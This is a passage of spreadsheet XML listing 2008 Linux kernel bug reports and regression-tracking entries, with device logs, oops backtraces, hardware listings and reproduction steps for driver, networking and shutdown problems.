device to settle before scanning usb 5-1: New USB device found, idVendor=071b, idProduct=3203 usb 5-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3 usb 5-1: Product: Eon MP3 usb 5-1: Manufacturer: EonSlide usb 5-1: SerialNumber: USBV1.00 usb-storage: device scan complete scsi 7:0:0:0: Direct-Access Eon Slide-R 1.00 PQ: 0 ANSI: 0 sd 7:0:0:0: [sdb] Attached SCSI removable disk sd 7:0:0:0: Attached scsi generic sg2 type 0 sd 7:0:0:0: [sdb] 16011264 512-byte hardware sectors (8198 MB) usb 5-1: reset full speed USB device using uhci_hcd and address 3 usb 5-1: reset full speed USB device using uhci_hcd and address 3 sd 7:0:0:0: [sdb] Write Protect is off sd 7:0:0:0: [sdb] Mode Sense: 03 00 00 00 sd 7:0:0:0: [sdb] Assuming drive cache: write through usb 5-1: USB disconnect, address 3 sd 7:0:0:0: [sdb] READ CAPACITY failed sd 7:0:0:0: [sdb] Result: hostbyte=DID_NO_CONNECT driverbyte=DRIVER_OK,SUGGEST_OK sd 7:0:0:0: [sdb] Sense not available. sd 7:0:0:0: [sdb] Write Protect is off sd 7:0:0:0: [sdb] Mode Sense: 00 00 00 00 sd 7:0:0:0: [sdb] Assuming drive cache: write through lsusb before disconnecting gives: Bus 002 Device 124: ID 071b:3203 Domain Technologies, Inc And finally lspci: 00:00.0 Host bridge: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub (rev 03) 00:01.0 PCI bridge: Intel Corporation Mobile PM965/GM965/GL960 PCI Express Root Port (rev 03) 00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #4 (rev 03) 00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 03) 00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 03) 00:1c.1 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 (rev 03) 00:1c.2 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 3 (rev 03) 00:1c.3 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 4 (rev 03) 00:1c.4 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 5 (rev 03) 00:1c.5 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 6 (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev f3) 00:1f.0 ISA bridge: Intel Corporation 82801HEM (ICH8M) LPC Interface Controller (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) IDE Controller (rev 03) 00:1f.2 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA IDE Controller (rev 03) 01:00.0 VGA compatible controller: nVidia Corporation GeForce 8400M G (rev a1) 02:00.0 Ethernet controller: Attansic Technology Corp. L1 Gigabit Ethernet Adapter (rev b0) 03:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN Network Connection (rev 61) 05:00.0 Memory controller: Intel Corporation Turbo Memory Controller (rev 01) 09:01.0 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 05) 09:01.1 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 22) 09:01.2 System peripheral: Ricoh Co Ltd R5C843 MMC Host Controller (rev 12) 09:01.3 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 12) 09:01.4 System peripheral: Ricoh Co Ltd xD-Picture Card Controller (rev ff) Problem similar to bug #11159, but none of suggestions from there helped.</t>
  </si>
  <si>
    <t>[linux-2.6/drivers/char/tpm/tpm.c:1208]: Memory leak: devname</t>
  </si>
  <si>
    <t>2008-08-25 10:56 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:34 UTC</t>
  </si>
  <si>
    <t>In the function tpm_register_hardware there is this condition... if (chip-&gt;dev_num &gt;= TPM_NUM_DEVICES) { dev_err(dev, "No available tpm device numbers\n"); kfree(chip); return NULL; } Before the return, devname should be kfree'd</t>
  </si>
  <si>
    <t>reproducible panic when reading cdrom (atapi dma)</t>
  </si>
  <si>
    <t>2.6.27-rc5</t>
  </si>
  <si>
    <t>2008-08-25 12:24 UTC</t>
  </si>
  <si>
    <t>Mathis Ahrens</t>
  </si>
  <si>
    <t>2011-08-26 15:19 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22 Earliest failing kernel version: 2.6.24 Distribution: Ubuntu 8.04 with vanilla kernel Hardware Environment: Fujitsu/Siemens Amilo Laptop Problem Description: When reading a few hundred MB from cdrom using DMA, kernel panics eventually. There are two setups WITHOUT this bug: - older kernels (where the cdrom gets mounted as hdc) - current kernels with libata.dma=1 (PIO4 mode ATAPI) Steps to reproduce: $ cp /media/cdromName/1-gb-file /home/onDisk After a few hundred MB, hard lockup: no LEDs, no SysRq, no logs. netconsole gave me the following output: [ 525.388025] divide error: 0000 [#1] SMP [ 525.388025] Modules linked in: netconsole configfs isofs binfmt_misc radeon drm rfcomm l2cap bluetooth ppdev powernow_k7 cpufreq_userspace cpufreq_stats cpufreq_powersave cpufreq_ondemand freq_table cpufreq_conservative video output sbs sbshc container iptable_filter ip_tables x_tables sbp2 lp ipv6 joydev tulip pcmcia serio_raw psmouse parport_pc parport pcspkr pwc videodev v4l1_compat i2c_viapro i2c_core via_ircc battery irda ac crc_ccitt yenta_socket button via_agp agpgart rsrc_nonstatic pcmcia_core shpchp pci_hotplug evdev ext3 jbd mbcache sg sr_mod cdrom sd_mod pata_via pata_acpi ata_generic libata via_rhine mii ehci_hcd uhci_hcd scsi_mod dock ohci1394 usbcore ieee1394 thermal processor fan thermal_sys fuse [ 525.388025] [ 525.388025] Pid: 6084, comm: trackerd Not tainted (2.6.26.3 #2) [ 525.388025] EIP: 0060:[&lt;c0103d3c&gt;] EFLAGS: 00200202 CPU: 0 [ 525.388025] EIP is at sysenter_past_esp+0x39/0xb1 [ 525.388025] EAX: 0000008c EBX: 0000001e ECX: 00000000 EDX: 000000d8 [ 525.388025] ESI: b7959bb0 EDI: 00000000 EBP: b7959b90 ESP: d9391fb8 [ 525.388025] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 525.388025] Process trackerd (pid: 6084, ti=d9390000 task=d9fba3f0 task.ti=d9390000) [ 525.388025] Stack: 0000001e 00000000 000f0000 b7959bb0 00000000 b7959b90 0000008c 0000007b [ 525.388025] 0000007b 00000000 0000008c b7f1b424 00000073 00200292 b7959b90 0000007b [ 525.388025] 00008067 00007067 [ 525.388025] Call Trace: [ 525.388025] ======================= [ 525.388025] Code: b4 24 34 e0 ff ff 50 fc 0f a0 06 1e 50 55 57 56 52 51 53 ba 7b 00 00 00 8e da 8e c2 ba d8 00 00 00 8e e2 fb 8d 04 05 00 00 00 00 &lt;90&gt; 8d 80 00 00 00 00 81 fd fd ff ff bf 0f 83 fa 01 00 00 8b 6d [ 525.388025] EIP: [&lt;c0103d3c&gt;] sysenter_past_esp+0x39/0xb1 SS:ESP 0068:d9391fb8 [ 525.388025] ---[ end trace 5028e900103372a1 ]--- [ 525.399790] divide error: 0000 [#2] SMP [ 525.399790] Modules linked in: netconsole configfs isofs binfmt_misc radeon drm rfcomm l2cap bluetooth ppdev powernow_k7 cpufreq_userspace cpufreq_stats cpufreq_powersave cpufreq_ondemand freq_table cpufreq_conservative video output sbs sbshc container iptable_filter ip_tables x_tables sbp2 lp ipv6 joydev tulip pcmcia serio_raw psmouse parport_pc parport pcspkr pwc videodev v4l1_compat i2c_viapro i2c_core via_ircc battery irda ac crc_ccitt yenta_socket button via_agp agpgart rsrc_nonstatic pcmcia_core shpchp pci_hotplug evdev ext3 jbd mbcache sg sr_mod cdrom sd_mod pata_via pata_acpi ata_generic libata via_rhine mii ehci_hcd uhci_hcd scsi_mod dock ohci1394 usbcore ieee1394 thermal processor fan thermal_sys fuse [ 525.399790] [ 525.399790] Pid: 0, comm: swapper Tainted: G D (2.6.26.3 #2) [ 525.399790] EIP: 0060:[&lt;e081d2ae&gt;] EFLAGS: 00000292 CPU: 0 [ 525.399790] EIP is at acpi_idle_enter_simple+0x16f/0x1dd [processor] [ 525.399790] EAX: c0479170 EBX: d5650000 ECX: 00006767 EDX: 00f8f000 [ 525.399790] ESI: d5650450 EDI: 001c3383 EBP: 001b8f17 ESP: c041ffac [ 525.399790] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 525.399790] Process swapper (pid: 0, ti=c041e000 task=c03f0340 task.ti=c041e000) [ 525.399790] Stack: 0000a46c 00000000 d56500cc d56500dc d565001c 00922007 c0288c9a c0288c10 [ 525.399790] 00000000 c047c480 c0102753 00000000 00099800 c040f000 c04239ef 00000035 [ 525.399790] c0423130 00000000 c044e900 00000000 00000000 [ 525.399790] Call Trace: [ 525.399790] [&lt;c0288c9a&gt;] cpuidle_idle_call+0x8a/0xd0 [ 525.399790] [&lt;c0288c10&gt;] cpuidle_idle_call+0x0/0xd0 [ 525.399790] [&lt;c0102753&gt;] cpu_idle+0x63/0xe0 [ 525.399790] ======================= [ 525.399790] Code: 8d 04 07 99 89 04 24 b8 17 01 00 00 89 54 24 04 f7 24 24 69 4c 24 04 17 01 00 00 8d 14 11 e8 7a 15 92 df fb 8d 04 05 00 00 00 00 &lt;90&gt; 90 89 e0 31 c9 25 00 e0 ff ff 89 f2 83 48 0c 02 89 d8 ff 46 [ 525.399790] EIP: [&lt;e081d2ae&gt;] acpi_idle_enter_simple+0x16f/0x1dd [processor] SS:ESP 0068:c041ffac [ 525.399790] ---[ end trace 5028e900103372a1 ]--- [ 525.399790] Kernel panic - not syncing: Attempted to kill the idle task! $ lspci 00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP] Host Bridge (rev 80) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge 00:09.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) 00:0b.0 CardBus bridge: O2 Micro, Inc. OZ601/6912/711E0 CardBus/SmartCardBus Controller (rev 20) 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge 00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) 00:11.6 Communication controller: VIA Technologies, Inc. AC'97 Modem Controller (rev 80) 00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 74) 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon RV250 [Mobility FireGL 9000] (rev 01) 02:00.0 Ethernet controller: ADMtek 21x4x DEC-Tulip compatible 10/100 Ethernet (rev 11)</t>
  </si>
  <si>
    <t>AMD systems with c1e enabled freeze without "nolapic_timer" option</t>
  </si>
  <si>
    <t>2008-08-25 17:04 UTC</t>
  </si>
  <si>
    <t>2008-09-04 11:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.11 Earliest failing kernel version: 2.6.26.3 Distribution: Fedora 8 Hardware Environment: Acer Aspire 5102 AMD RS480 chipset, Turion dual-core CPU Software Environment: x86 kernel compiled for i686 32-bit CPU Problem Description: Local APIC timer does not get disabled because it is set up and marked operational before c1e gets detected on the second CPU. You can sometimes make progress by pressing keys but the system can get stuck in __do_softirq() and must be powered off manually. In 2.6.25.11, c1e gets detected before the timers are set up. Adding "nolapic_timer" option fixes it.</t>
  </si>
  <si>
    <t>Selecting CONFIG_RTC_CLASS excludes CONFIG_SND_RTCTIMER</t>
  </si>
  <si>
    <t>2008-08-26 05:55 UTC</t>
  </si>
  <si>
    <t>William</t>
  </si>
  <si>
    <t>2012-05-22 13:36 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.6 Earliest failing kernel version: 2.6.26 Distribution: Slackware 12 Hardware Environment: AMD K8 on Asus M2NPV-VM Software Environment: Using GNU Make 3.81 Problem Description: During kernel config, selecting CONFIG_RTC_CLASS (rtc-core) excludes CONFIG_SND_RTCTIMER (snd-rtctimer) Both options were independently available in 2.6.25.6, the changed behaviour described below first appeared in 2.6.26 and is repeated in 2.6.26.1 and 2.6.26.3 If the intention was that the two options should be exclusive then could a note be provided in the help text/documentaion to that effect, OR if the that was not the intention is it possible to revert to the previous behaviour? Steps to reproduce: Untar kernel 2.6.26.3 source. Start off without any ".config" file. make menuconfig First confirm that "Device Drivers -&gt; Sound -&gt; ALSA -&gt; RTC Timer support" option is available. Next select "Device Drivers -&gt; Real Time Clock". This results in the option "Device Drivers -&gt; Sound ALSA -&gt; RTC Timer support" no longer being shown. The area of interest on the menu :- Linux Kernel v2.6.26.3 Configuration Device Drivers ---&gt; Sound ---&gt; Advanced Linux Sound Architecture ---&gt; &lt; &gt; RTC Timer support (NEW) &lt;---- | Exclusive | in 2.6.26.x &lt; &gt; Real Time Clock ---&gt; &lt;----</t>
  </si>
  <si>
    <t>r8169 exits with error -22</t>
  </si>
  <si>
    <t>2008-08-27 12:07 UTC</t>
  </si>
  <si>
    <t>Georg Grabler</t>
  </si>
  <si>
    <t>2011-03-26 15:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.26 Distribution: ARCH Linux Hardware Environment: Dell Vostro 1510 Software Environment: Linux x86 (i686) Problem Description: The driver sometimes fails, sometime does not fail. If it does not fail to load, I am not able to connect to any network. The latest realtec 8168 drivers work (http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&amp;PNid=13&amp;PFid=5&amp;Level=5&amp;Conn=4&amp;DownTypeID=3&amp;GetDown=false) Additional information: https://bugs.launchpad.net/ubuntu/+bug/231102 Steps to reproduce: Uhm, plug in a network cable and try to do some networking?</t>
  </si>
  <si>
    <t>oops due to smp_call_function_single changes</t>
  </si>
  <si>
    <t>commit cc7a486cac78f6fc1a24e8cd63036bae8d2ab431</t>
  </si>
  <si>
    <t>2008-08-27 13:52 UTC</t>
  </si>
  <si>
    <t>2008-08-31 04:28 UTC</t>
  </si>
  <si>
    <t>Subject : oops due to smp_call_function_single changes Submitter : Avi Kivity &lt;avi@qumranet.com&gt; Date : 2008-08-24 16:41 References : http://marc.info/?l=linux-kernel&amp;m=121959612027162&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ixgbe: fix vlan filtering</t>
  </si>
  <si>
    <t>2.6.27-rc4-git</t>
  </si>
  <si>
    <t>2008-08-27 13:58 UTC</t>
  </si>
  <si>
    <t>2008-08-30 13:59 UTC</t>
  </si>
  <si>
    <t>Subject : ixgbe: fix vlan filtering Submitter : Jeff Kirsher &lt;jeffrey.t.kirsher@intel.com&gt; Date : 2008-08-27 1:30 References : http://marc.info/?l=linux-netdev&amp;m=121980061622847&amp;w=4 Handled-By : Alexander Duyck &lt;alexander.h.duyck@intel.com&gt; Patch : http://marc.info/?l=linux-netdev&amp;m=121980061622847&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.27-rc4-git4] compilation warnings</t>
  </si>
  <si>
    <t>[2.6.27-rc4-git4</t>
  </si>
  <si>
    <t>2008-08-27 14:32 UTC</t>
  </si>
  <si>
    <t>2008-09-24 12:16 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.27-rc4-git4] compilation warnings Submitter : "Rufus &amp; Azrael" &lt;rufus-azrael@numericable.fr&gt; Date : 2008-08-26 9:37 References : http://marc.info/?l=linux-kernel&amp;m=121974353815440&amp;w=4 Handled-By : Greg KH &lt;gregkh@suse.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121976424221858&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ipv4: sysctl fixes causes "cannot open /proc/sys/net/ipv4/route/flush"</t>
  </si>
  <si>
    <t>2.6.27-rc4-git5</t>
  </si>
  <si>
    <t>2008-08-27 14:37 UTC</t>
  </si>
  <si>
    <t>2008-08-29 03:42 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.27-rc4-git5] ipv4: sysctl fixes causes "cannot open /proc/sys/net/ipv4/route/flush" Submitter : "Rufus &amp; Azrael" &lt;rufus-azrael@numericable.fr&gt; Date : 2008-08-26 16:54 References : http://marc.info/?l=linux-kernel&amp;m=121976978001228&amp;w=4 Handled-By : Al Viro &lt;viro@zeniv.linux.org.uk&gt; Patch : http://lkml.org/lkml/2008/8/26/236 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lots of 'in_atomic():1, irqs_disabled():0' with software-raid1</t>
  </si>
  <si>
    <t>2008-08-27 14:41 UTC</t>
  </si>
  <si>
    <t>2008-09-06 15:21 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc4: lots of 'in_atomic():1, irqs_disabled():0' with software-raid1 Submitter : jurriaan &lt;thunder7@xs4all.nl&gt; Date : 2008-08-27 17:05 References : http://marc.info/?l=linux-kernel&amp;m=121985847724696&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>btusb hibernation/suspend breakage in current -git</t>
  </si>
  <si>
    <t>2.6.27-rc4-git6</t>
  </si>
  <si>
    <t>2008-08-27 15:32 UTC</t>
  </si>
  <si>
    <t>2008-10-24 14:16 UTC</t>
  </si>
  <si>
    <t>Subject : btusb hibernation/suspend breakage in current -git Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-08-25 11:37 References : http://marc.info/?l=linux-bluetooth&amp;m=121966402012074&amp;w=4 Handled-By : Oliver Neukum &lt;oliver@neukum.org&gt; Patch : http://marc.info/?l=linux-bluetooth&amp;m=121967226027323&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>section mismatch in mm/page_alloc.c vs mm/bootmem.c</t>
  </si>
  <si>
    <t>2008-08-27 19:01 UTC</t>
  </si>
  <si>
    <t>Roger Blofeld</t>
  </si>
  <si>
    <t>2008-09-03 03:16 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.26-6380-g8b05c7e Earliest failing kernel version: v2.6.26-6381-gb61bfa3 Distribution: Fedora 9 Hardware Environment: powerpc Software Environment: gcc 4.3.1-6 Problem Description: WARNING: mm/built-in.o(.data+0x80c): Section mismatch in reference from the variable contig_page_data to the variable .init.data:bootmem_node_data The variable contig_page_data references the variable __initdata bootmem_node_data If the reference is valid then annotate the variable with __init* (see linux/init.h) or name the variable: *driver, *_template, *_timer, *_sht, *_ops, *_probe, *_probe_one, *_console, Steps to reproduce: make where CONFIG_NEED_MULTIPLE_NODES is not set Commit b61bfa3c462671c48a51fb5c31af337c5a996a04 declared in mm/bootmem.c: +bootmem_data_t bootmem_node_data[MAX_NUMNODES] __initdata; and used in mm/page_alloc.c: +struct pglist_data contig_page_data = { .bdata = &amp;bootmem_node_data[0] }; Seems both or neither should be __initdata.</t>
  </si>
  <si>
    <t>/proc/sys/net/ipv4/route/flush not found</t>
  </si>
  <si>
    <t>2.6.27-rc4-git7</t>
  </si>
  <si>
    <t>2008-08-28 11:06 UTC</t>
  </si>
  <si>
    <t>2008-08-29 10:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27-rc4 Earliest failing kernel version: probably 2.6.27-rc4-git7 Distribution: Gentoo Hardware Environment: Software Environment: Problem Description: When the lo interface is initialized, the following error occurs: can't open /proc/sys/net/ipv4/route/flush: no such file. After a bisection, it appears that the following commit is the first bad commit: commit 2f4520d35d89ca6c5cd129c38e3b11f0283b7d1b Author: Al Viro &lt;viro@zeniv.linux.org.uk&gt; Date: Mon Aug 25 15:17:44 2008 -0700 ipv4: sysctl fixes net.ipv4.neigh should be a part of skeleton to avoid ordering problems Signed-off-by: Al Viro &lt;viro@zeniv.linux.org.uk&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; If I revert it, the problem doesn't occur.</t>
  </si>
  <si>
    <t>/proc/acpi/ibm/wan stopped appearing</t>
  </si>
  <si>
    <t>2008-08-29 11:58 UTC</t>
  </si>
  <si>
    <t>2008-09-06 15:15 UTC</t>
  </si>
  <si>
    <t>Subject : /proc/acpi/ibm/wan stopped appearing Submitter : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Date : 2008-08-27 22:11 References : http://marc.info/?l=linux-kernel&amp;m=121987514922627&amp;w=4 Handled-By : Henrique de Moraes Holschuh &lt;hmh@hmh.eng.br&gt; Handled-By : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121989632915800&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>md (regression): reboot/shutdown hangs</t>
  </si>
  <si>
    <t>commit 2b25000bf5157c28d8591f03f0575248a8cbd900</t>
  </si>
  <si>
    <t>2008-08-29 12:07 UTC</t>
  </si>
  <si>
    <t>2008-09-02 13:31 UTC</t>
  </si>
  <si>
    <t>Subject : md (regression): reboot/shutdown hangs Submitter : Alistair John Strachan &lt;alistair@devzero.co.uk&gt; Date : 2008-08-28 19:05 References : http://marc.info/?l=linux-kernel&amp;m=121995040514645&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Michael Long</t>
  </si>
  <si>
    <t>kernel crash after wifi connection established</t>
  </si>
  <si>
    <t>v2.6.27-rc5</t>
  </si>
  <si>
    <t>2008-08-30 03:08 UTC</t>
  </si>
  <si>
    <t>2008-09-22 07:46 UTC</t>
  </si>
  <si>
    <t>after reboot and gdm logon my machine stuck. i tried git kernel v2.6.27-rc5. when i switch to tty1 before connection established i can see kernel crash. that happens only on fedora config-2.6.27-0.290.rc5.fc10 and never on fedora config kernel-2.6.26.3-17.fc9</t>
  </si>
  <si>
    <t>2.6.27-rc3 to -rc4 regression: init 0 hangs in halt</t>
  </si>
  <si>
    <t>2008-08-30 04:07 UTC</t>
  </si>
  <si>
    <t>David Greaves</t>
  </si>
  <si>
    <t>2008-09-01 02:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27-rc3 Earliest failing kernel version: 2.6.27-rc4 Distribution: Debian based Hardware Environment: Desktop machine root fs on /dev/md0 Software Environment: boot to kdm splash. No login Problem Description: Hangs in halt. netconsole stops after nfsd shutdown. I've taken some photos and will upload/link later. Steps to reproduce: init 0 from multiuser (single user is OK)</t>
  </si>
  <si>
    <t>build breakage</t>
  </si>
  <si>
    <t>commit da574983de9f9283ba35662c8723627096e160de</t>
  </si>
  <si>
    <t>2008-08-30 13:19 UTC</t>
  </si>
  <si>
    <t>2008-09-02 12:40 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] Re: Linux 2.6.27-rc5 Submitter : Helge Deller &lt;deller@gmx.de&gt; Date : 2008-08-30 10:34 References : http://marc.info/?l=linux-kernel&amp;m=122009254918593&amp;w=4 Handled-By : Helge Deller &lt;deller@gmx.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122009254918593&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>v2.6.27-rc5 regression: mtd/block device issue with cmd_filter</t>
  </si>
  <si>
    <t>2008-08-30 13:23 UTC</t>
  </si>
  <si>
    <t>2008-09-02 13:27 UTC</t>
  </si>
  <si>
    <t>Subject : v2.6.27-rc5 regression: mtd/block device issue with cmd_filter Submitter : Laurent Pinchart &lt;laurentp@cse-semaphore.com&gt; Date : 2008-08-29 10:50 References : http://marc.info/?l=linux-kernel&amp;m=122000707631759&amp;w=4 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122000748432301&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>TUN with 1024 neighbours: ip6_dst_lookup_tail NULL crash</t>
  </si>
  <si>
    <t>2008-08-31 09:44 UTC</t>
  </si>
  <si>
    <t>2008-09-09 23:20 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none known Earliest failing kernel version: none tested Distribution: Debian Hardware Environment: Intel(R) Pentium(R) 4 CPU 2.80GHz, HyperThreaded Software Environment: SMT kernel, Debian glibc 2.7 Problem Description: When an IFF_TUN (/dev/net/tun) device has more than 1023 IPv6 neighbors, a process context crash occurs. Backtrace follows: BUG: unable to handle kernel NULL pointer dereference at 0000001d IP: [&lt;f8b375bf&gt;] :ipv6:ip6_dst_lookup_tail+0x95/0x15a *pde = 00000000 Oops: 0000 [#14] SMP Modules linked in: ipx p8022 psnap llc p8023 i915 drm tun cpufreq_ondemand binfmt_misc fuse nf_conntrack_ftp nf_conntrack_ipv6 nf_conntrack_ipv4 nf_conntrack ipv6 snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd intel_agp psmouse soundcore agpgart button processor snd_page_alloc parport_pc parport iTCO_wdt evdev pcspkr dm_mirror dm_log dm_snapshot dm_mod sg sr_mod cdrom e100 mii ehci_hcd uhci_hcd usbcore unix Pid: 9950, comm: tunload Tainted: G D (2.6.26.3 #8) EIP: 0060:[&lt;f8b375bf&gt;] EFLAGS: 00210246 CPU: 0 EIP is at ip6_dst_lookup_tail+0x95/0x15a [ipv6] EAX: 00000000 EBX: 00000000 ECX: ef4abdac EDX: 00000000 ESI: ef4abd3c EDI: ef64ca00 EBP: ef4abcb8 ESP: ef4abc64 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process tunload (pid: 9950, ti=ef4aa000 task=f7d45320 task.ti=ef4aa000) Stack: ef4abd58 ef4abdac f7cc0c00 ef4abc80 f8b36918 00000000 ef673e40 ef4abcc0 f8b381b2 00000002 f7cc0c00 ef7c3e00 f7cc0e24 00000000 ef4abca8 ef4abca8 c030bcfa ef4abcc0 00000000 ef4abed4 00000000 ef4abcc0 f8b377d5 ef4abdbc Call Trace: [&lt;f8b36918&gt;] ? ip6_cork_release+0x2e/0x52 [ipv6] [&lt;f8b381b2&gt;] ? ip6_push_pending_frames+0x1c9/0x3d9 [ipv6] [&lt;c030bcfa&gt;] ? _spin_unlock_bh+0xd/0xf [&lt;f8b377d5&gt;] ? ip6_dst_lookup+0xe/0x10 [ipv6] [&lt;f8b4c2b2&gt;] ? rawv6_sendmsg+0x25d/0xc08 [ipv6] [&lt;c0151022&gt;] ? filemap_fault+0x203/0x3d5 [&lt;c02e8de0&gt;] ? inet_sendmsg+0x2e/0x50 [&lt;c02a24b8&gt;] ? sock_sendmsg+0xcc/0xf0 [&lt;c01365f5&gt;] ? autoremove_wake_function+0x0/0x3a [&lt;c0136799&gt;] ? remove_wait_queue+0x30/0x34 [&lt;f8a08fbe&gt;] ? tun_chr_aio_read+0x298/0x31f [tun] [&lt;c0211d67&gt;] ? copy_from_user+0x2a/0x114 [&lt;c02a2790&gt;] ? sys_sendto+0xa5/0xc5 [&lt;c02b3713&gt;] ? neigh_periodic_timer+0x0/0x17a [&lt;c01365f5&gt;] ? autoremove_wake_function+0x0/0x3a [&lt;c02a348f&gt;] ? sys_socketcall+0x141/0x262 [&lt;c0102f99&gt;] ? sysenter_past_esp+0x6a/0x91 ======================= Code: 22 83 fb 9b 74 37 8b 4d b0 8b 01 e8 35 96 77 c7 8b 45 b0 c7 00 00 00 00 00 89 d8 83 c4 48 5b 5e 5f 5d c3 8b 4d b0 8b 39 8b 47 2c &lt;f6&gt; 40 1d de 74 23 31 db 89 d8 83 c4 48 5b 5e 5f 5d c3 64 a1 04 EIP: [&lt;f8b375bf&gt;] ip6_dst_lookup_tail+0x95/0x15a [ipv6] SS:ESP 0068:ef4abc64 ---[ end trace 1035c8e1d028e84b ]--- Steps to reproduce: Test case available at: http://www.remlab.net/files/divers/tunload.c</t>
  </si>
  <si>
    <t>pppoe not working when acting as gateway.</t>
  </si>
  <si>
    <t>2008-08-31 09:59 UTC</t>
  </si>
  <si>
    <t>Pierluigi</t>
  </si>
  <si>
    <t>2009-01-29 13:18 UTC</t>
  </si>
  <si>
